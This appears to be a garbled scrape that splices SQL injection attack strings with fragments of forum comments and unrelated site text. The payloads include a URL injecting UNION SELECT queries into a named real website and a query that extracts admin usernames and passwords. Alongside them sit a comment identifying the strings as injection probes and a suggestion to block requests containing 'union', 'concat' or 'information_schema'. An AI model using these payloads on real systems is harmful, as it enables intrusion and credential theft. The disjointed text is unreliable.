http://www.itamed.com/mcms/itamedt/content.cfm?pulldata=scmsmembers.cfm&function=members&perform=memberappita&entity_id=11+limit+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version
So, as it's being used a lot, I would submit my answer. In my opinion, the aim of these requests is to check the presence or absence of a sql injection. This is the part of the query that is trying to inject: 999999.9 UNION ALL SELECT "91351456272.9","91351456272.9"...
View as Grid List. 1 Item.
-999.9+union+all+select+%27R3DM0V3_hvj_injection',null%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL
cast bar48 sec ago.
+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1)x+group+by+concat
On my site, for instance, it's entirely safe to fail any request with the string 'concat' or %20union' or 'information_schema'. Indeed, I can even ban any IP that so much as bothers to attempt a request including such strings.
...all select id =null union all select id =1 +and+ false + union +all +select id = 9999 union all select +.
-1 UNION SELECT group_concat(username, 0x3a, password) FROM admin.
Word Spark search letters: rep)+UNION+ALL+SELECT+NULL,NULL,NULL,NULL--+jMaw.